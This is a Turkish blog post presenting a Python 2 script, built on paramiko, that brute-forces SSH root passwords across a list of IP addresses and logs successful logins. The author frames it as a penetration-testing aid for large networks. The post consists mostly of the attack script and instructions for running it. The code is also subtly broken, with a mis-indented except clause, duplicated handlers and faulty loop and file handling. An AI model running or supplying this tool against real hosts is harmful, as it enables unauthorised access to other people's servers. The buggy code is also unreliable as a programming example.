Şub 23

Python ile SSH brute force

Bu yazımda Python ile ssh brute force işlemini gerçekleştiren kod betiğini inceleyeceğiz.

Bazı testler de scan edilecek kuruma ait ip bloğu çok fazla olabiliyor, üniversiteler gibi

Bu gibi durumlar da basic brute force testler gerçekleştiriliyor ve bu testler de farklı brute force tools ları kullanılıyor.

Hydra ve benzeri yazılımlara çok fazla ip adresi için brute force yapmasını istediğinizde kilitleniyor.

Bende bu durumda başımın çağresine bakmalıydım ve öyle de yaptım, oturdum python da kendim ssh brute force yapan bir tools yazdım, kodlar aşağıdaki şekilde.

Kodların kötüye kullanılmayacağını temenni ederek paylaşıyorum, kötüye kullanımıda sorumluluk kullanıcıya aittir.

Bu dosyayı bir dizine atın, aynı dizine ,

SSH.log, SSH.txt, password.txt text dosyalarını oluşturun, test edilecek ip adreslerini SSH.txt ye password listenizi password.txt ye yerleştirin. python ssh.py şeklinde çalıştırın.


import paramiko
import itertools,string,crypt
import socket
logfile=open('SSH.log', 'w')
ipaddress=open("SSH.txt", 'r')
password = open('password.txt', 'r')
passlist=password.readlines()
iplist=ipaddress.readlines()
ipcount=len(iplist)
x=0
y=0
for x in range(0, ipcount):
	for y in passlist:
		try:
			ssh=paramiko.SSHClient()
			ssh.load_system_host_keys()
			ssh.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy())
			ssh.connect(iplist[x], port='22', username='root', password=y.rstrip())
			print iplist[x].rstrip()
			print y
			print "Login Success"
			logfile.write(str(iplist[x]))
			logfile.write(str(y))
			logfile.close()
			x=x+1

		except paramiko.AuthenticationException, error:
			print "-------------"
			print iplist[x].rstrip()
			print y.rstrip()
			print "Not Login"
			continue
			except socket.error, error:
			print error
			x=x+1
			continue
		except paramiko.SSHException, error:
			print error
			print "Most probably this is caused by a missing host key"
			x=x+1
			continue
		except Exception, error:
			print "Unknown error:"
			logfile.write(str(iplist[x]))
			logfile.write(str(y))
			logfile.close()
			x=x+1
			continue
		except Exception,error :
			print error
			x=x+1
			continue
		except Exception,error :
			print error
			x=x+1

Share Button

Bir cevap yazın